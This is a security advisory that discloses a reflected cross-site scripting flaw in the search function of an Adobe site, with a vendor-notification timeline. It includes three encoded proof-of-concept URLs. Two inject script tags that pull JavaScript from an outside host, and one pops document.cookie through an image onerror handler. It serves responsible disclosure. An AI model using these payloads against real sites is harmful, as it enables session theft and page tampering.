---------------------------------------------------------------------------------------------------- Title : Adobe Experience Delivers reflected Cross-site Scripting (XSS) vulnerability Vendor : Adobe Systems Incorporated (http://www.adobe.com) Description : experiencedelivers.adobe.com is vulnerable to reflected Cross-site Scripting attacks Advisory time-line: ---------------------------------------------------------------------------------------------------- - Vendor PSIRT notified : 05-Aug-2012 - Vendor response : 05-Aug-2012. Ticket created. "Looking into it now". - Status requests : 09-Sep-2012, 01-Nov-2012, 08-Nov-2012, 13-Nov-2012, 31-Dec-2012 Adobe PSIRT has not responded to any requests after 09-Nov-2012 - Packet Storm advisory : 19-Jan-2013 Test environment ---------------------------------------------------------------------------------------------------- - Latest Firefox browser Details ---------------------------------------------------------------------------------------------------- Affected functionality: search function Test #1: Remote Javascript execution: display browser cookie http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fidash.net%2Fxs.js%3E%3C%2FSCRIPT%3E&blog=search&_charset_=UTF-8 Test #2, Remote Javascript execution: overwrite HTML content - PoC http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fidash.net%2Fae00.js%3E%3C%2Fscript%3E&blog=search&_charset_=UTF-8 Test #3, Alert test with image-tag http://experiencedelivers.adobe.com/cemblog/en/experiencedelivers.html?query=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&blog=search&_charset_=UTF-8 Note: the Javascript test cases are not malicious. Researcher ---------------------------------------------------------------------------------------------------- Janne Ahlberg Twitter: https://twitter.com/JanneFI Blog: http://janne.is Project site: http://idash.net ----------------------------------------------------------------------------------------------------